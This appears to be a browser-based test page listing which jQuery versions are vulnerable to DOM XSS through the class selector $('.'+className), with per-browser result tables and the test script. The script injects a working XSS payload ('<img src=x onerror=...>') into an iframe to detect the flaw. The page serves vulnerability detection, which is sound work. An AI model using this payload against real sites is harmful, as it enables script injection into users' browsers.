jQuery Versions Vulnerable to Selector XSS with class Attribute ('. XSS_VECTOR')
List of all jQuery versions vulnerable to class selector XSS. These jQuery libraries cause DOM XSS when a user controlled value is passed as a the class selected [$('.'+ className)]
By
0
Seen 7811 times
Tags
Run this test now.
Results
Chrome
Firefox
Mobile Safari
Chromium
Safari
Chrome Mobile
Opera
IE
Tested on
Chrome - 78 - Mac OS X
| jQuery Version | Is it Vulnerable? |
|---|---|
| jQuery 1.12.2 | Safe |
| jQuery 1.10.2 | Safe |
| jQuery 1.10.1 | Safe |
| jQuery 1.9.1 | Safe |
| jQuery 1.10.0 | Safe |
| jQuery 1.9.0 | Safe |
| jQuery 1.12.3 | Safe |
| jQuery 1.8.2 | Vulnerable |
| jQuery 1.8.1 | Vulnerable |
| jQuery 1.8.0 | Vulnerable |
| jQuery 1.7.2 | Vulnerable |
| jQuery 1.7.1 | Vulnerable |
| jQuery 1.5.1 | Safe |
| jQuery 1.7.0 | Vulnerable |
| jQuery 1.6.4 | Vulnerable |
| jQuery 1.6.3 | Vulnerable |
| jQuery 1.6.2 | Vulnerable |
| jQuery 1.6.1 | Vulnerable |
| jQuery 1.6.0 | Vulnerable |
| jQuery 1.5.2 | Vulnerable |
| jQuery 1.5.0 | Vulnerable |
| jQuery 1.2.3 | Vulnerable |
| jQuery 1.4.4 | Vulnerable |
| jQuery 1.4.3 | Vulnerable |
| jQuery 1.4.2 | Vulnerable |
| jQuery 1.4.1 | Vulnerable |
| jQuery 1.4.0 | Vulnerable |
| jQuery 1.3.2 | Vulnerable |
| jQuery 1.3.1 | Vulnerable |
| jQuery 1.2.6 | Vulnerable |
| jQuery 1.3.0 | Vulnerable |
Tested on
Firefox - 67 - Windows 10
| jQuery Version | Is it Vulnerable? |
|---|---|
| jQuery 1.12.2 | Safe |
| jQuery 1.10.1 | Safe |
| jQuery 1.10.2 | Safe |
| jQuery 1.12.3 | Safe |
| jQuery 1.9.1 | Safe |
| jQuery 1.10.0 | Safe |
| jQuery 1.9.0 | Safe |
| jQuery 1.8.0 | Vulnerable |
| jQuery 1.8.1 | Vulnerable |
| jQuery 1.8.2 | Vulnerable |
| jQuery 1.7.2 | Vulnerable |
| jQuery 1.7.1 | Vulnerable |
| jQuery 1.5.1 | Safe |
| jQuery 1.5.2 | Vulnerable |
| jQuery 1.6.4 | Vulnerable |
| jQuery 1.6.2 | Vulnerable |
| jQuery 1.6.0 | Vulnerable |
| jQuery 1.6.3 | Vulnerable |
| jQuery 1.7.0 | Vulnerable |
| jQuery 1.6.1 | Vulnerable |
| jQuery 1.4.4 | Vulnerable |
| jQuery 1.4.3 | Vulnerable |
| jQuery 1.5.0 | Vulnerable |
| jQuery 1.4.1 | Vulnerable |
| jQuery 1.3.2 | Vulnerable |
| jQuery 1.4.2 | Vulnerable |
| jQuery 1.3.1 | Vulnerable |
| jQuery 1.4.0 | Vulnerable |
| jQuery 1.3.0 | Vulnerable |
| jQuery 1.2.6 | Vulnerable |
| jQuery 1.2.3 | Vulnerable |
Tested on
Mobile Safari - 11 - iOS
| jQuery Version | Is it Vulnerable? |
|---|---|
| jQuery 1.10.2 | Safe |
| jQuery 1.9.0 | Safe |
| jQuery 1.9.1 | Safe |
| jQuery 1.10.1 | Safe |
| jQuery 1.10.0 | Safe |
| jQuery 1.12.2 | Safe |
| jQuery 1.12.3 | Safe |
| jQuery 1.6.4 | Vulnerable |
| jQuery 1.6.3 | Vulnerable |
| jQuery 1.8.2 | Vulnerable |
| jQuery 1.7.2 | Vulnerable |
| jQuery 1.7.1 | Vulnerable |
| jQuery 1.8.0 | Vulnerable |
| jQuery 1.6.2 | Vulnerable |
| jQuery 1.8.1 | Vulnerable |
| jQuery 1.7.0 | Vulnerable |
| jQuery 1.6.1 | Vulnerable |
| jQuery 1.5.1 | Safe |
| jQuery 1.4.4 | Vulnerable |
| jQuery 1.4.3 | Vulnerable |
| jQuery 1.5.0 | Vulnerable |
| jQuery 1.5.2 | Vulnerable |
| jQuery 1.4.0 | Vulnerable |
| jQuery 1.3.2 | Vulnerable |
| jQuery 1.4.1 | Vulnerable |
| jQuery 1.4.2 | Vulnerable |
| jQuery 1.6.0 | Vulnerable |
| jQuery 1.3.1 | Vulnerable |
| jQuery 1.3.0 | Vulnerable |
| jQuery 1.2.3 | Vulnerable |
| jQuery 1.2.6 | Vulnerable |
Tested on
Chromium - 59 - Ubuntu
| jQuery Version | Is it Vulnerable? |
|---|---|
| jQuery 1.9.1 | Safe |
| jQuery 1.10.0 | Safe |
| jQuery 1.12.2 | Safe |
| jQuery 1.10.2 | Safe |
| jQuery 1.10.1 | Safe |
| jQuery 1.12.3 | Safe |
| jQuery 1.9.0 | Safe |
| jQuery 1.8.2 | Vulnerable |
| jQuery 1.8.1 | Vulnerable |
| jQuery 1.8.0 | Vulnerable |
| jQuery 1.5.1 | Safe |
| jQuery 1.7.2 | Vulnerable |
| jQuery 1.7.1 | Vulnerable |
| jQuery 1.6.2 | Vulnerable |
| jQuery 1.7.0 | Vulnerable |
| jQuery 1.6.3 | Vulnerable |
| jQuery 1.6.4 | Vulnerable |
| jQuery 1.6.1 | Vulnerable |
| jQuery 1.6.0 | Vulnerable |
| jQuery 1.4.4 | Vulnerable |
| jQuery 1.5.0 | Vulnerable |
| jQuery 1.5.2 | Vulnerable |
| jQuery 1.4.3 | Vulnerable |
| jQuery 1.4.2 | Vulnerable |
| jQuery 1.4.1 | Vulnerable |
| jQuery 1.3.2 | Vulnerable |
| jQuery 1.4.0 | Vulnerable |
| jQuery 1.3.1 | Vulnerable |
| jQuery 1.3.0 | Vulnerable |
| jQuery 1.2.6 | Vulnerable |
| jQuery 1.2.3 | Vulnerable |
Tested on
Safari - 11.1 - Mac OS X
| jQuery Version | Is it Vulnerable? |
|---|---|
| jQuery 1.12.3 | Safe |
| jQuery 1.9.0 | Safe |
| jQuery 1.9.1 | Safe |
| jQuery 1.10.1 | Safe |
| jQuery 1.10.2 | Safe |
| jQuery 1.10.0 | Safe |
| jQuery 1.12.2 | Safe |
| jQuery 1.7.2 | Vulnerable |
| jQuery 1.6.4 | Vulnerable |
| jQuery 1.8.2 | Vulnerable |
| jQuery 1.6.2 | Vulnerable |
| jQuery 1.6.3 | Vulnerable |
| jQuery 1.7.1 | Vulnerable |
| jQuery 1.8.0 | Vulnerable |
| jQuery 1.8.1 | Vulnerable |
| jQuery 1.7.0 | Vulnerable |
| jQuery 1.5.1 | Safe |
| jQuery 1.4.3 | Vulnerable |
| jQuery 1.4.1 | Vulnerable |
| jQuery 1.4.4 | Vulnerable |
| jQuery 1.5.0 | Vulnerable |
| jQuery 1.6.1 | Vulnerable |
| jQuery 1.4.2 | Vulnerable |
| jQuery 1.6.0 | Vulnerable |
| jQuery 1.5.2 | Vulnerable |
| jQuery 1.4.0 | Vulnerable |
| jQuery 1.2.3 | Vulnerable |
| jQuery 1.3.2 | Vulnerable |
| jQuery 1.3.0 | Vulnerable |
| jQuery 1.2.6 | Vulnerable |
| jQuery 1.3.1 | Vulnerable |
Tested on
Chrome Mobile - 41 - Android
| jQuery Version | Is it Vulnerable? |
|---|---|
| No Data enumerated. The Data Array was empty. |
Tested on
Opera - 50 - Windows 10
| jQuery Version | Is it Vulnerable? |
|---|---|
| jQuery 1.10.2 | Safe |
| jQuery 1.10.1 | Safe |
| jQuery 1.12.2 | Safe |
| jQuery 1.9.1 | Safe |
| jQuery 1.10.0 | Safe |
| jQuery 1.9.0 | Safe |
| jQuery 1.12.3 | Safe |
| jQuery 1.8.1 | Vulnerable |
| jQuery 1.8.0 | Vulnerable |
| jQuery 1.8.2 | Vulnerable |
| jQuery 1.7.1 | Vulnerable |
| jQuery 1.5.1 | Safe |
| jQuery 1.7.0 | Vulnerable |
| jQuery 1.6.4 | Vulnerable |
| jQuery 1.6.3 | Vulnerable |
| jQuery 1.6.2 | Vulnerable |
| jQuery 1.6.1 | Vulnerable |
| jQuery 1.7.2 | Vulnerable |
| jQuery 1.4.2 | Vulnerable |
| jQuery 1.6.0 | Vulnerable |
| jQuery 1.5.2 | Vulnerable |
| jQuery 1.4.4 | Vulnerable |
| jQuery 1.5.0 | Vulnerable |
| jQuery 1.4.3 | Vulnerable |
| jQuery 1.4.1 | Vulnerable |
| jQuery 1.4.0 | Vulnerable |
| jQuery 1.3.2 | Vulnerable |
| jQuery 1.3.1 | Vulnerable |
| jQuery 1.3.0 | Vulnerable |
| jQuery 1.2.6 | Vulnerable |
| jQuery 1.2.3 | Vulnerable |
Tested on
IE - 11 - Windows 10
| jQuery Version | Is it Vulnerable? |
|---|---|
| jQuery 1.9.0 | Safe |
| jQuery 1.9.1 | Safe |
| jQuery 1.10.0 | Safe |
| jQuery 1.10.1 | Safe |
| jQuery 1.12.2 | Safe |
| jQuery 1.12.3 | Safe |
| jQuery 1.10.2 | Safe |
| jQuery 1.8.2 | Vulnerable |
| jQuery 1.8.1 | Vulnerable |
| jQuery 1.8.0 | Vulnerable |
| jQuery 1.7.2 | Vulnerable |
| jQuery 1.7.1 | Vulnerable |
| jQuery 1.7.0 | Vulnerable |
| jQuery 1.6.4 | Vulnerable |
| jQuery 1.6.3 | Vulnerable |
| jQuery 1.6.1 | Vulnerable |
| jQuery 1.6.2 | Vulnerable |
| jQuery 1.5.1 | Safe |
| jQuery 1.6.0 | Vulnerable |
| jQuery 1.5.0 | Vulnerable |
| jQuery 1.4.4 | Vulnerable |
| jQuery 1.5.2 | Vulnerable |
| jQuery 1.4.3 | Vulnerable |
| jQuery 1.4.2 | Vulnerable |
| jQuery 1.3.2 | Vulnerable |
| jQuery 1.4.1 | Vulnerable |
| jQuery 1.4.0 | Vulnerable |
| jQuery 1.3.1 | Vulnerable |
| jQuery 1.2.6 | Vulnerable |
| jQuery 1.2.3 | Vulnerable |
| jQuery 1.3.0 | Vulnerable |
User Script (ENUM_FUNCTION)
// Custom Functions
var jQuery_version = '';
function vulnerable(){
addError('jQuery '+ jQuery_version, '<b>Vulnerable</b>');
}
function safe(){
addSuccess('jQuery '+ jQuery_version, 'Safe');
}
function removeIframe(){
var x = document.getElementById('jQueryFrameID');
x.parentNode.removeChild(x);
}
// Test Function
function test(data){
// We need to separate properties and access one by one.
try{
jQuery_version = data;
var jQueryFrame = document.createElement('iframe');
jQueryFrame.id = 'jQueryFrameID';
jQueryFrame.onload = function(){
var jQueryScript = jQueryFrame.contentWindow.document.createElement('script');
jQueryScript.type = 'text/javascript';
jQueryScript.src = 'https://ajax.googleapis.com/ajax/libs/jquery/'+ data.toString() +'/jquery.js';
jQueryFrame.contentWindow.document.body.appendChild(jQueryScript);
jQueryScript.onload = function(){
var exploitScript = "try{function bad(){parent.vulnerable(); parent.removeIframe();} $('. <img src=x onerror=bad();>');} catch(err){parent.safe();parent.removeIframe();}";
var exploit = jQueryFrame.contentWindow.document.createElement('script');
exploit.type = 'text/javascript';
exploit.innerHTML = exploitScript;
jQueryFrame.contentWindow.document.body.appendChild(exploit);
};
jQueryScript.onerror = function(){
addResult(data , 'Some Error Occured');
}
};
document.body.appendChild(jQueryFrame);
}
catch(err){
addInfo(data , 'Some Error Occured');
}
}
Enum Data (ENUM_FUNCTION)
// Taken from jQuery Versions Under, https://developers.google.com/speed/libraries/devguide#jquery
var data = ['1.12.3', '1.12.2', '1.10.2', '1.10.1',
'1.10.0', '1.9.1', '1.9.0', '1.8.2', '1.8.1', '1.8.0',
'1.7.2', '1.7.1', '1.7.0', '1.6.4', '1.6.3', '1.6.2', '1.6.1',
'1.6.0', '1.5.2', '1.5.1', '1.5.0', '1.4.4', '1.4.3', '1.4.2',
'1.4.1', '1.4.0', '1.3.2', '1.3.1', '1.3.0', '1.2.6', '1.2.3'];